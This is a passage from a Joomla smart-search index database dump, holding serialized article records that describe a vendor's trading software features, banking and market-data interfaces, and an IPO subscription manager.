</span></span></b><!--[endif]--><b><span style=\"font-family: \'Century Gothic\',sans-serif;\">Easy installation and maintenance</span></b></p>\r\n<p class=\"MsoListParagraphCxSpLast\" style=\"margin-left: 1.5in; mso-add-space: auto; text-indent: -.25in; mso-list: l0 level2 lfo1;\"><!-- [if !supportLists]--><b><span style=\"font-family: \'Century Gothic\',sans-serif; mso-fareast-font-family: \'Century Gothic\'; mso-bidi-font-family: \'Century Gothic\';\">d.<span style=\"font-weight: normal; font-stretch: normal; font-size: 7pt; line-height: normal; font-family: \'Times New Roman\';\"> </span></span></b><!--[endif]--><b><span style=\"font-family: \'Century Gothic\',sans-serif;\">Graphs/Charts</span></b></p>\r\n<p class=\"MsoListParagraphCxSpLast\" style=\"margin-left: 1.5in; mso-add-space: auto; text-indent: -.25in; mso-list: l0 level2 lfo1;\"> </p>\r\n<p class=\"MsoListParagraph\" style=\"margin-left: 1.5in; text-indent: -.25in; mso-list: l0 level2 lfo1;\"> <a href=\"mailto: info@fitoman.com\">More Details</a></p>\";s:4:\"body\";s:0:\"\";s:5:\"catid\";s:2:\"14\";s:10:\"created_by\";s:3:\"736\";s:16:\"created_by_alias\";s:0:\"\";s:8:\"modified\";s:19:\"2015-04-12 19:18:35\";s:11:\"modified_by\";s:3:\"736\";s:6:\"params\";O:24:\"Joomla\\Registry\\Registry\":1:{s:7:\"\0*\0data\";O:8:\"stdClass\":69:{s:14:\"article_layout\";s:9:\"_:default\";s:10:\"show_title\";s:1:\"1\";s:11:\"link_titles\";s:1:\"1\";s:10:\"show_intro\";s:1:\"1\";s:13:\"show_category\";s:1:\"1\";s:13:\"link_category\";s:1:\"1\";s:20:\"show_parent_category\";s:1:\"0\";s:20:\"link_parent_category\";s:1:\"0\";s:11:\"show_author\";s:1:\"1\";s:11:\"link_author\";s:1:\"0\";s:16:\"show_create_date\";s:1:\"1\";s:16:\"show_modify_date\";s:1:\"0\";s:17:\"show_publish_date\";s:1:\"0\";s:20:\"show_item_navigation\";s:1:\"0\";s:9:\"show_vote\";s:1:\"0\";s:13:\"show_readmore\";s:1:\"1\";s:19:\"show_readmore_title\";s:1:\"0\";s:14:\"readmore_limit\";s:3:\"100\";s:10:\"show_icons\";s:1:\"1\";s:15:\"show_print_icon\";s:1:\"1\";s:15:\"show_email_icon\";s:1:\"1\";s:9:\"show_hits\";s:1:\"0\";s:11:\"show_noauth\";s:1:\"0\";s:13:\"urls_position\";s:1:\"0\";s:23:\"show_publishing_options\";s:1:\"1\";s:20:\"show_article_options\";s:1:\"1\";s:25:\"show_urls_images_frontend\";s:1:\"1\";s:24:\"show_urls_images_backend\";s:1:\"1\";s:7:\"targeta\";i:0;s:7:\"targetb\";i:0;s:7:\"targetc\";i:0;s:11:\"float_intro\";s:5:\"right\";s:14:\"float_fulltext\";s:5:\"right\";s:15:\"category_layout\";s:6:\"_:blog\";s:32:\"show_category_heading_title_text\";s:1:\"1\";s:19:\"show_category_title\";s:1:\"0\";s:16:\"show_description\";s:1:\"0\";s:22:\"show_description_image\";s:1:\"0\";s:8:\"maxLevel\";s:1:\"1\";s:21:\"show_empty_categories\";s:1:\"0\";s:16:\"show_no_articles\";s:1:\"1\";s:16:\"show_subcat_desc\";s:1:\"1\";s:21:\"show_cat_num_articles\";s:1:\"0\";s:21:\"show_base_description\";s:1:\"1\";s:11:\"maxLevelcat\";s:2:\"-1\";s:25:\"show_empty_categories_cat\";s:1:\"0\";s:20:\"show_subcat_desc_cat\";s:1:\"1\";s:25:\"show_cat_num_articles_cat\";s:1:\"1\";s:20:\"num_leading_articles\";s:1:\"1\";s:18:\"num_intro_articles\";s:1:\"4\";s:11:\"num_columns\";s:1:\"2\";s:9:\"num_links\";s:1:\"4\";s:18:\"multi_column_order\";s:1:\"0\";s:24:\"show_subcategory_content\";s:1:\"0\";s:21:\"show_pagination_limit\";s:1:\"1\";s:12:\"filter_field\";s:4:\"hide\";s:13:\"show_headings\";s:1:\"1\";s:14:\"list_show_date\";s:1:\"0\";s:11:\"date_format\";s:0:\"\";s:14:\"list_show_hits\";s:1:\"1\";s:16:\"list_show_author\";s:1:\"1\";s:11:\"orderby_pri\";s:5:\"order\";s:11:\"orderby_sec\";s:5:\"rdate\";s:10:\"order_date\";s:9:\"published\";s:15:\"show_pagination\";s:1:\"2\";s:23:\"show_pagination_results\";s:1:\"1\";s:14:\"show_feed_link\";s:1:\"1\";s:12:\"feed_summary\";s:1:\"0\";s:18:\"feed_show_readmore\";s:1:\"0\";}}s:7:\"metakey\";s:0:\"\";s:8:\"metadesc\";s:0:\"\";s:8:\"metadata\";O:24:\"Joomla\\Registry\\Registry\":1:{s:7:\"\0*\0data\";O:8:\"stdClass\":4:{s:6:\"robots\";s:0:\"\";s:6:\"author\";s:0:\"\";s:6:\"rights\";s:0:\"\";s:10:\"xreference\";s:0:\"\";}}s:7:\"version\";s:1:\"3\";s:8:\"ordering\";s:1:\"0\";s:8:\"category\";s:20:\"Sample Data-Articles\";s:9:\"cat_state\";s:1:\"1\";s:10:\"cat_access\";s:1:\"1\";s:4:\"slug\";s:51:\"122:mobile-tablet-trading-information-dissemination\";s:7:\"catslug\";s:23:\"14:sample-data-articles\";s:6:\"author\";s:10:\"Super User\";s:6:\"layout\";s:7:\"article\";s:4:\"path\";s:114:\"index.php/services/mobiletablettrading/14-sample-data-articles/122-mobile-tablet-trading-information-dissemination\";s:10:\"metaauthor\";N;}s:15:\"\0*\0instructions\";a:5:{i:1;a:3:{i:0;s:5:\"title\";i:1;s:8:\"subtitle\";i:2;s:2:\"id\";}i:2;a:2:{i:0;s:7:\"summary\";i:1;s:4:\"body\";}i:3;a:8:{i:0;s:4:\"meta\";i:1;s:10:\"list_price\";i:2;s:10:\"sale_price\";i:3;s:7:\"metakey\";i:4;s:8:\"metadesc\";i:5;s:10:\"metaauthor\";i:6;s:6:\"author\";i:7;s:16:\"created_by_alias\";}i:4;a:2:{i:0;s:4:\"path\";i:1;s:5:\"alias\";}i:5;a:1:{i:0;s:8:\"comments\";}}s:11:\"\0*\0taxonomy\";a:4:{s:4:\"Type\";a:1:{s:7:\"Article\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:7:\"Article\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:6:\"Author\";a:1:{s:10:\"Super User\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:10:\"Super User\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Category\";a:1:{s:20:\"Sample Data-Articles\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:20:\"Sample Data-Articles\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Language\";a:1:{s:5:\"en-GB\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:5:\"en-GB\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}}s:3:\"url\";s:48:\"index.php?option=com_content&view=article&id=122\";s:5:\"route\";s:137:\"index.php?option=com_content&view=article&id=122:mobile-tablet-trading-information-dissemination&catid=14:sample-data-articles&Itemid=686\";s:5:\"title\";s:49:\"Mobile/Tablet Trading & Information Dissemination\";s:11:\"description\";s:318:\"a. Online integration with Back Office System b. Compatibility across a range of devices , HTML5 app will work on different mobile OS’s, whether that’s iOS, Android, Windows Phone or Blackberry c. Easy installation and maintenanceauto; text-indent: -.25in; mso-list: l0 level2 lfo1;\"> d. Graphs/Charts More Details\";s:9:\"published\";N;s:5:\"state\";i:1;s:6:\"access\";s:1:\"1\";s:8:\"language\";s:5:\"en-GB\";s:18:\"publish_start_date\";s:19:\"2015-04-12 19:01:36\";s:16:\"publish_end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"start_date\";s:19:\"2015-04-12 19:01:36\";s:8:\"end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"list_price\";N;s:10:\"sale_price\";N;s:7:\"type_id\";i:3;s:15:\"defaultLanguage\";s:5:\"en-GB\";}'),(58,'index.php?option=com_content&view=article&id=123','index.php?option=com_content&view=article&id=123:interfaces-with&catid=14:sample-data-articles&Itemid=687','Interfaces with:','a. Reuters Order Routing b. Bloomberg Interface c. Core Banking Application d.font-stretch: normal; font-size: 7pt; line-height: normal; font-family: \'Times New Roman\';\"> SWIFT Interface e. Call Center Interfaces f. IVR interfaces g. SMS Gateway[if !suppo','2015-04-12 15:24:36','cf8d71de93744ade183ec7920cc0cb6b',1,1,1,'en-GB','2015-04-12 19:01:36','0000-00-00 00:00:00','2015-04-12 19:01:36','0000-00-00 00:00:00',0,0,3,'O:19:\"FinderIndexerResult\":19:{s:11:\"\0*\0elements\";a:24:{s:2:\"id\";s:3:\"123\";s:5:\"alias\";s:15:\"interfaces-with\";s:7:\"summary\";s:5367:\"<p class=\"MsoListParagraphCxSpFirst\" style=\"margin-left: 1.5in; mso-add-space: auto; text-indent: -.25in; mso-list: l0 level2 lfo1;\"><!-- [if !supportLists]--><b><span style=\"font-family: \'Century Gothic\',sans-serif; mso-fareast-font-family: \'Century Gothic\'; mso-bidi-font-family: \'Century Gothic\';\">a.<span style=\"font-weight: normal; font-stretch: normal; font-size: 7pt; line-height: normal; font-family: \'Times New Roman\';\"> </span></span></b><!--[endif]--><b><span style=\"font-family: \'Century Gothic\',sans-serif;\">Reuters Order Routing </span></b></p>\r\n<p class=\"MsoListParagraphCxSpMiddle\" style=\"margin-left: 1.5in; mso-add-space: auto; text-indent: -.25in; mso-list: l0 level2 lfo1;\"><!-- [if !supportLists]--><b><span style=\"font-family: \'Century Gothic\',sans-serif; mso-fareast-font-family: \'Century Gothic\'; mso-bidi-font-family: \'Century Gothic\';\">b.<span style=\"font-weight: normal; font-stretch: normal; font-size: 7pt; line-height: normal; font-family: \'Times New Roman\';\"> </span></span></b><!--[endif]--><b><span style=\"font-family: \'Century Gothic\',sans-serif;\">Bloomberg Interface</span></b></p>\r\n<p class=\"MsoListParagraphCxSpMiddle\" style=\"margin-left: 1.5in; mso-add-space: auto; text-indent: -.25in; mso-list: l0 level2 lfo1;\"><!-- [if !supportLists]--><b><span style=\"font-family: \'Century Gothic\',sans-serif; mso-fareast-font-family: \'Century Gothic\'; mso-bidi-font-family: \'Century Gothic\';\">c.<span style=\"font-weight: normal; font-stretch: normal; font-size: 7pt; line-height: normal; font-family: \'Times New Roman\';\"> </span></span></b><!--[endif]--><b><span style=\"font-family: \'Century Gothic\',sans-serif;\">Core Banking Application</span></b></p>\r\n<p class=\"MsoListParagraphCxSpMiddle\" style=\"margin-left: 1.5in; mso-add-space: auto; text-indent: -.25in; mso-list: l0 level2 lfo1;\"><!-- [if !supportLists]--><b><span style=\"font-family: \'Century Gothic\',sans-serif; mso-fareast-font-family: \'Century Gothic\'; mso-bidi-font-family: \'Century Gothic\';\">d.<span style=\"font-weight: normal; font-stretch: normal; font-size: 7pt; line-height: normal; font-family: \'Times New Roman\';\"> </span></span></b><!--[endif]--><b><span style=\"font-family: \'Century Gothic\',sans-serif;\">SWIFT Interface</span></b></p>\r\n<p class=\"MsoListParagraphCxSpMiddle\" style=\"margin-left: 1.5in; mso-add-space: auto; text-indent: -.25in; mso-list: l0 level2 lfo1;\"><!-- [if !supportLists]--><b><span style=\"font-family: \'Century Gothic\',sans-serif; mso-fareast-font-family: \'Century Gothic\'; mso-bidi-font-family: \'Century Gothic\';\">e.<span style=\"font-weight: normal; font-stretch: normal; font-size: 7pt; line-height: normal; font-family: \'Times New Roman\';\"> </span></span></b><!--[endif]--><b><span style=\"font-family: \'Century Gothic\',sans-serif;\">Call Center Interfaces</span></b></p>\r\n<p class=\"MsoListParagraphCxSpMiddle\" style=\"margin-left: 1.5in; mso-add-space: auto; text-indent: -.25in; mso-list: l0 level2 lfo1;\"><!-- [if !supportLists]--><b><span style=\"font-family: \'Century Gothic\',sans-serif; mso-fareast-font-family: \'Century Gothic\'; mso-bidi-font-family: \'Century Gothic\';\">f.<span style=\"font-weight: normal; font-stretch: normal; font-size: 7pt; line-height: normal; font-family: \'Times New Roman\';\"> </span></span></b><!--[endif]--><b><span style=\"font-family: \'Century Gothic\',sans-serif;\">IVR interfaces</span></b></p>\r\n<p class=\"MsoListParagraphCxSpMiddle\" style=\"margin-left: 1.5in; mso-add-space: auto; text-indent: -.25in; mso-list: l0 level2 lfo1;\"><!-- [if !supportLists]--><b><span style=\"font-family: \'Century Gothic\',sans-serif; mso-fareast-font-family: \'Century Gothic\'; mso-bidi-font-family: \'Century Gothic\';\">g.<span style=\"font-weight: normal; font-stretch: normal; font-size: 7pt; line-height: normal; font-family: \'Times New Roman\';\"> </span></span></b><!--[endif]--><b><span style=\"font-family: \'Century Gothic\',sans-serif;\">SMS Gateway</span></b></p>\r\n<p class=\"MsoListParagraphCxSpMiddle\" style=\"margin-left: 1.5in; mso-add-space: auto; text-indent: -.25in; mso-list: l0 level2 lfo1;\"><!-- [if !supportLists]--><b><span style=\"font-family: \'Century Gothic\',sans-serif; mso-fareast-font-family: \'Century Gothic\'; mso-bidi-font-family: \'Century Gothic\';\">h.<span style=\"font-weight: normal; font-stretch: normal; font-size: 7pt; line-height: normal; font-family: \'Times New Roman\';\"> </span></span></b><!--[endif]--><b><span style=\"font-family: \'Century Gothic\',sans-serif;\">Fax Interfaces</span></b></p>\r\n<p class=\"MsoListParagraphCxSpLast\" style=\"margin-left: 1.5in; mso-add-space: auto; text-indent: -.25in; mso-list: l0 level2 lfo1;\"><!-- [if !supportLists]--><b><span style=\"font-family: \'Century Gothic\',sans-serif; mso-fareast-font-family: \'Century Gothic\'; mso-bidi-font-family: \'Century Gothic\';\">i.<span style=\"font-weight: normal; font-stretch: normal; font-size: 7pt; line-height: normal; font-family: \'Times New Roman\';\"> </span></span></b><!--[endif]--><b><span style=\"font-family: \'Century Gothic\',sans-serif;\">Email Interfaces</span></b></p>\r\n<p class=\"MsoListParagraphCxSpLast\" style=\"margin-left: 1.5in; mso-add-space: auto; text-indent: -.25in; mso-list: l0 level2 lfo1;\"> </p>\r\n<p class=\"MsoListParagraph\" style=\"margin-left: 1.5in; text-indent: -.25in; mso-list: l0 level2 lfo1;\"> <a href=\"mailto: info@fitoman.com\">More Details</a></p>\";s:4:\"body\";s:0:\"\";s:5:\"catid\";s:2:\"14\";s:10:\"created_by\";s:3:\"736\";s:16:\"created_by_alias\";s:0:\"\";s:8:\"modified\";s:19:\"2015-04-12 19:24:36\";s:11:\"modified_by\";s:3:\"736\";s:6:\"params\";O:24:\"Joomla\\Registry\\Registry\":1:{s:7:\"\0*\0data\";O:8:\"stdClass\":69:{s:14:\"article_layout\";s:9:\"_:default\";s:10:\"show_title\";s:1:\"1\";s:11:\"link_titles\";s:1:\"1\";s:10:\"show_intro\";s:1:\"1\";s:13:\"show_category\";s:1:\"1\";s:13:\"link_category\";s:1:\"1\";s:20:\"show_parent_category\";s:1:\"0\";s:20:\"link_parent_category\";s:1:\"0\";s:11:\"show_author\";s:1:\"1\";s:11:\"link_author\";s:1:\"0\";s:16:\"show_create_date\";s:1:\"1\";s:16:\"show_modify_date\";s:1:\"0\";s:17:\"show_publish_date\";s:1:\"0\";s:20:\"show_item_navigation\";s:1:\"0\";s:9:\"show_vote\";s:1:\"0\";s:13:\"show_readmore\";s:1:\"1\";s:19:\"show_readmore_title\";s:1:\"0\";s:14:\"readmore_limit\";s:3:\"100\";s:10:\"show_icons\";s:1:\"1\";s:15:\"show_print_icon\";s:1:\"1\";s:15:\"show_email_icon\";s:1:\"1\";s:9:\"show_hits\";s:1:\"0\";s:11:\"show_noauth\";s:1:\"0\";s:13:\"urls_position\";s:1:\"0\";s:23:\"show_publishing_options\";s:1:\"1\";s:20:\"show_article_options\";s:1:\"1\";s:25:\"show_urls_images_frontend\";s:1:\"1\";s:24:\"show_urls_images_backend\";s:1:\"1\";s:7:\"targeta\";i:0;s:7:\"targetb\";i:0;s:7:\"targetc\";i:0;s:11:\"float_intro\";s:5:\"right\";s:14:\"float_fulltext\";s:5:\"right\";s:15:\"category_layout\";s:6:\"_:blog\";s:32:\"show_category_heading_title_text\";s:1:\"1\";s:19:\"show_category_title\";s:1:\"0\";s:16:\"show_description\";s:1:\"0\";s:22:\"show_description_image\";s:1:\"0\";s:8:\"maxLevel\";s:1:\"1\";s:21:\"show_empty_categories\";s:1:\"0\";s:16:\"show_no_articles\";s:1:\"1\";s:16:\"show_subcat_desc\";s:1:\"1\";s:21:\"show_cat_num_articles\";s:1:\"0\";s:21:\"show_base_description\";s:1:\"1\";s:11:\"maxLevelcat\";s:2:\"-1\";s:25:\"show_empty_categories_cat\";s:1:\"0\";s:20:\"show_subcat_desc_cat\";s:1:\"1\";s:25:\"show_cat_num_articles_cat\";s:1:\"1\";s:20:\"num_leading_articles\";s:1:\"1\";s:18:\"num_intro_articles\";s:1:\"4\";s:11:\"num_columns\";s:1:\"2\";s:9:\"num_links\";s:1:\"4\";s:18:\"multi_column_order\";s:1:\"0\";s:24:\"show_subcategory_content\";s:1:\"0\";s:21:\"show_pagination_limit\";s:1:\"1\";s:12:\"filter_field\";s:4:\"hide\";s:13:\"show_headings\";s:1:\"1\";s:14:\"list_show_date\";s:1:\"0\";s:11:\"date_format\";s:0:\"\";s:14:\"list_show_hits\";s:1:\"1\";s:16:\"list_show_author\";s:1:\"1\";s:11:\"orderby_pri\";s:5:\"order\";s:11:\"orderby_sec\";s:5:\"rdate\";s:10:\"order_date\";s:9:\"published\";s:15:\"show_pagination\";s:1:\"2\";s:23:\"show_pagination_results\";s:1:\"1\";s:14:\"show_feed_link\";s:1:\"1\";s:12:\"feed_summary\";s:1:\"0\";s:18:\"feed_show_readmore\";s:1:\"0\";}}s:7:\"metakey\";s:0:\"\";s:8:\"metadesc\";s:0:\"\";s:8:\"metadata\";O:24:\"Joomla\\Registry\\Registry\":1:{s:7:\"\0*\0data\";O:8:\"stdClass\":4:{s:6:\"robots\";s:0:\"\";s:6:\"author\";s:0:\"\";s:6:\"rights\";s:0:\"\";s:10:\"xreference\";s:0:\"\";}}s:7:\"version\";s:1:\"3\";s:8:\"ordering\";s:1:\"0\";s:8:\"category\";s:20:\"Sample Data-Articles\";s:9:\"cat_state\";s:1:\"1\";s:10:\"cat_access\";s:1:\"1\";s:4:\"slug\";s:19:\"123:interfaces-with\";s:7:\"catslug\";s:23:\"14:sample-data-articles\";s:6:\"author\";s:10:\"Super User\";s:6:\"layout\";s:7:\"article\";s:4:\"path\";s:73:\"index.php/services/interfaces/14-sample-data-articles/123-interfaces-with\";s:10:\"metaauthor\";N;}s:15:\"\0*\0instructions\";a:5:{i:1;a:3:{i:0;s:5:\"title\";i:1;s:8:\"subtitle\";i:2;s:2:\"id\";}i:2;a:2:{i:0;s:7:\"summary\";i:1;s:4:\"body\";}i:3;a:8:{i:0;s:4:\"meta\";i:1;s:10:\"list_price\";i:2;s:10:\"sale_price\";i:3;s:7:\"metakey\";i:4;s:8:\"metadesc\";i:5;s:10:\"metaauthor\";i:6;s:6:\"author\";i:7;s:16:\"created_by_alias\";}i:4;a:2:{i:0;s:4:\"path\";i:1;s:5:\"alias\";}i:5;a:1:{i:0;s:8:\"comments\";}}s:11:\"\0*\0taxonomy\";a:4:{s:4:\"Type\";a:1:{s:7:\"Article\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:7:\"Article\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:6:\"Author\";a:1:{s:10:\"Super User\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:10:\"Super User\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Category\";a:1:{s:20:\"Sample Data-Articles\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:20:\"Sample Data-Articles\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Language\";a:1:{s:5:\"en-GB\";O:7:\"JObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:5:\"en-GB\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}}s:3:\"url\";s:48:\"index.php?option=com_content&view=article&id=123\";s:5:\"route\";s:105:\"index.php?option=com_content&view=article&id=123:interfaces-with&catid=14:sample-data-articles&Itemid=687\";s:5:\"title\";s:16:\"Interfaces with:\";s:11:\"description\";s:317:\"a. Reuters Order Routing b. Bloomberg Interface c. Core Banking Application d.font-stretch: normal; font-size: 7pt; line-height: normal; font-family: \'Times New Roman\';\"> SWIFT Interface e. Call Center Interfaces f. IVR interfaces g. SMS Gateway[if !supportLists]--> h. Fax Interfaces i. Email Interfaces More Details\";s:9:\"published\";N;s:5:\"state\";i:1;s:6:\"access\";s:1:\"1\";s:8:\"language\";s:5:\"en-GB\";s:18:\"publish_start_date\";s:19:\"2015-04-12 19:01:36\";s:16:\"publish_end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"start_date\";s:19:\"2015-04-12 19:01:36\";s:8:\"end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"list_price\";N;s:10:\"sale_price\";N;s:7:\"type_id\";i:3;s:15:\"defaultLanguage\";s:5:\"en-GB\";}'),(68,'index.php?option=com_content&view=article&id=127','index.php?option=com_content&view=article&id=127:initial-public-offering-solution-ipo-manager-2&catid=14:sample-data-articles&Itemid=435','Initial Public Offering Solution (IPO Manager) (2)','a. Facilitate transaction manual and automated entry (file upload / Export) b. The system will eliminate the need to produce batch files and send it to the IPO center. Each subscription application is entered by the subscription outlet will be saved direc','2015-04-12 15:43:10','c3e344310b7fc871a45ea991198f8f71',1,0,1,'en-GB','2015-04-12 19:01:36','0000-00-00 00:00:00','2015-04-12 19:01:36','0000-00-00 00:00:00',0,0,3,'O:19:\"FinderIndexerResult\":19:{s:11:\"\0*\0elements\";a:24:{s:2:\"id\";s:3:\"127\";s:5:\"alias\";s:46:\"initial-public-offering-solution-ipo-manager-2\";s:7:\"summary\";s:4422:\"<p class=\"MsoListParagraphCxSpFirst\" style=\"margin-left: 1.5in; mso-add-space: auto; text-indent: -.25in; mso-list: l0 level2 lfo1;\"><!-- [if !supportLists]--><b><span style=\"font-family: \'Century Gothic\',sans-serif; mso-fareast-font-family: \'Century Gothic\'; mso-bidi-font-family: \'Century Gothic\';\">a.<span style=\"font-weight: normal; font-stretch: normal; font-size: 7pt; line-height: normal; font-family: \'Times New Roman\';\"> </span></span></b><!--[endif]--><b><span style=\"font-family: \'Century Gothic\',sans-serif;\">Facilitate transaction manual and automated entry (file upload / Export) </span></b></p>\r\n<p class=\"MsoListParagraphCxSpMiddle\" style=\"margin-left: 1.5in; mso-add-space: auto; text-indent: -.25in; mso-list: l0 level2 lfo1;\"><!-- [if !supportLists]--><b><span style=\"font-family: \'Century Gothic\',sans-serif; mso-fareast-font-family: \'Century Gothic\'; mso-bidi-font-family: \'Century Gothic\';\">b.<span style=\"font-weight: normal; font-stretch: normal; font-size: 7pt; line-height: normal; font-family: \'Times New Roman\';\"> </span></span></b><!--[endif]--><b><span style=\"font-family: \'Century Gothic\',sans-serif;\">The system will eliminate the need to produce batch files and send it to the IPO center. Each subscription application is entered by the subscription outlet will be saved directly into the central database. </span></b></p>\r\n<p class=\"MsoListParagraphCxSpMiddle\" style=\"margin-left: 1.5in; mso-add-space: auto; text-indent: -.25in; mso-list: l0 level2 lfo1;\"><!-- [if !supportLists]--><b><span style=\"font-family: \'Century Gothic\',sans-serif; mso-fareast-font-family: \'Century Gothic\'; mso-bidi-font-family: \'Century Gothic\';\">c.<span style=\"font-weight: normal; font-stretch: normal; font-size: 7pt; line-height: normal; font-family: \'Times New Roman\';\"> </span></span></b><!--[endif]--><b><span style=\"font-family: \'Century Gothic\',sans-serif;\">The user entered the application can view and verify his entry, and then the manual applications will be sent to the IPO center to be validated and approved. </span></b></p>\r\n<p class=\"MsoListParagraphCxSpMiddle\" style=\"margin-left: 1.5in; mso-add-space: auto; text-indent: -.25in; mso-list: l0 level2 lfo1;\"><!-- [if !supportLists]--><b><span style=\"font-family: \'Century Gothic\',sans-serif; mso-fareast-font-family: \'Century Gothic\'; mso-bidi-font-family: \'Century Gothic\';\">d.<span style=\"font-weight: normal; font-stretch: normal; font-size: 7pt; line-height: normal; font-family: \'Times New Roman\';\"> </span></span></b><!--[endif]--><b><span style=\"font-family: \'Century Gothic\',sans-serif;\">After the validation and approval of the applications by the IPO center no other alteration to the data is allowed.</span></b></p>\r\n<p class=\"MsoListParagraphCxSpMiddle\" style=\"margin-left: 1.5in; mso-add-space: auto; text-indent: -.25in; mso-list: l0 level2 lfo1;\"><!-- [if !supportLists]--><b><span style=\"font-family: \'Century Gothic\',sans-serif; mso-fareast-font-family: \'Century Gothic\'; mso-bidi-font-family: \'Century Gothic\';\">e.<span style=\"font-weight: normal; font-stretch: normal; font-size: 7pt; line-height: normal; font-family: \'Times New Roman\';\"> </span></span></b><!--[endif]--><b><span style=\"font-family: \'Century Gothic\',sans-serif;\">Different reports can be generated by subscription outlet to ensure the validity of their input. Also a wide range of reports can be generated by the IPO center on real time basis to check on the subscription progress.</span></b></p>\r\n<p class=\"MsoListParagraphCxSpLast\" style=\"margin-left: 1.5in; mso-add-space: auto; text-indent: -.25in; mso-list: l0 level2 lfo1;\"><!-- [if !supportLists]--><b><span style=\"font-family: \'Century Gothic\',sans-serif; mso-fareast-font-family: \'Century Gothic\'; mso-bidi-font-family: \'Century Gothic\';\">f.<span style=\"font-weight: normal; font-stretch: normal; font-size: 7pt; line-height: normal; font-family: \'Times New Roman\';\"> </span></span></b><!--[endif]--><b><span style=\"font-family: \'Century Gothic\',sans-serif;\">Can generate deferent scenarios for allotment before close the subscription </span></b></p>\r\n<p class=\"MsoListParagraphCxSpLast\" style=\"margin-left: 1.5in; mso-add-space: auto; text-indent: -.25in; mso-list: l0 level2 lfo1;\"> </p>\r\n<p class=\"MsoListParagraph\" style=\"margin-left: 1.5in; text-indent: -.25in; mso-list: l0 level2 lfo1;\"> <a href=\"mailto: info@fitoman.com\">More Details</a></p>\";s:4:\"body\";s:0:\"\";s:5:\"catid\";s:2:\"14\";s:10:\"created_by\";s:3:\"736\";s:16:\"created_by_alias\";s:0:\"\";s:8:\"modified\";s:19:\"2015-04-12 19:42:35\";s:11:\"modified_by\";s:1:\"0\";s:6:\"params\";O:24:\"Joomla\\Registry\\Registry\":1:{s:7:\"\0*\0data\";O:8:\"stdClass\":69:{s:14:\"article_layout\";s:9:\"_:default\";s:10:\"show_title\";s:1:\"1\";s:11:\"link_titles\";s:1:\"1\";s:10:\"show_intro\";s:1:\"1\";s:13:\"show_category\";s:1:\"1\";s:13:\"link_category\";s:1:\"1\";s:20:\"show_parent_category\";s:1:\"0\";s:20:\"link_parent_category\";s:1:\"0\";s:11:\"show_author\";s:1:\"1\";s:11:\"link_author\";s:1:\"0\";s:16:\"show_create_date\";s:1:\"1\";s:16:\"show_modify_date\";s:1:\"0\";s:17:\"show_publish_date\";s:1:\"0\";s:20:\"show_item_navigation\";s:1:\"0\";s:9:\"show_vote\";s:1:\"0\";s:13:\"show_readmore\";s:1:\"1\";s:19:\"show_readmore_title\";s:1:\"0\";s:14:\"readmore_limit\";s:3:\"100\";s:10:\"show_icons\";s:1:\"1\";s:15:\"show_print_icon\";s:1:\"1\";s:15:\"show_email_icon\";s:1:\"1\";s:9:\"show_hits\";s:1:\"0\";s:11:\"show_noauth\";s:1:\"0\";s:13:\"urls_position\";s:1:\"0\";s:23:\"show_publishing_options\";s:1:\"1\";s:20:\"show_article_options\";s:1:\"1\";s:25:\"show_urls_images_frontend\";s:1:\"1\";s:24:\"show_urls_images_backend\";s:1:\"1\";s:7:\"targeta\";i:0;s:7:\"targetb\";i:0;s:7:\"targetc\";i:0;s:11:\"float_intro\";s:5:\"right\";s:14:\"float_fulltext\";s:5:\"right\";s:15:\"category_layout\";s:6:\"_:blog\";s:32:\"show_category_heading_title_text\";s:1:\"1\";s:19:\"show_category_title\";s:1:\"0\";s:16:\"show_description\";s:1:\"0\";s:22:\"show_description_image\";s:1:\"0\";s:8:\"maxLevel\";s:1:\"1\";s:21:\"show_empty_categories\";s:1:\"0\";s:16:\"show_no_articles\";s:1:\"1\";s:16:\"show_subcat_desc\";s:1:\"1\";s:21:\"show_cat_num_articles\";s:1:\"0\";s:21:\"show_base_description\";s:1:\"1\";s:11:\"maxLevelcat\";s:2:\"-1\";s:25:\"show_empty_categories_cat\";s:1:\"0\";s:20:\"show_subcat_desc_cat\";s:1:\"1\";s:25:\"show_cat_num_articles_cat\";s:1:\"1\";s:20:\"num_leading_articles\";s:1:\"1\";s:18:\"num_intro_articles\";s:1:\"4\";s:11:\"num_columns\";s:1:\"2\";s:9:\"num_links\";s:1:\"4\";s:18:\"multi_column_order\";s:1:\"0\";s:24:\"show_subcategory_content\";s:1:\"0\";s:21:\"show_pagination_limit\";s:1:\"1\";s:12:\"filter_field\";s:4:\"hide\";s:13:\"show_headings\";s:1:\"1\";s:14:\"list_show_date\";s:1:\"0\";s:11:\"date_format\";s:0:\"\";s:14:\"list_show_hits\";s:1:\"1\";s:16:\"list_show_author\";s:1:\"1\";s:11:\"orderby_pri\";s:5:\"order\";s:11:\"orderby_sec\";s:5:\"rdate\";s:10:\"order_date\";s:9:\"published\";s:15:\"show_pagination\";s:1:\"2\";s:23:\"show_pagination_results\";s:1:\"1\";s:14:\"show_feed_link\";s:1:\"1\";s:12:\"feed_summary\";s:1:\"0\";s:18:\"feed_show_readmore\";s:1:\"0\";}}s:7:\"metakey\";s:0:\"\";s:8:\"metadesc\";s:0:\"\";s:8:\"metadata\";O:24:\"Joomla\\Registry\\Registry\":1:{s:7:\"\0*\0data\";O:8:\"stdClass\"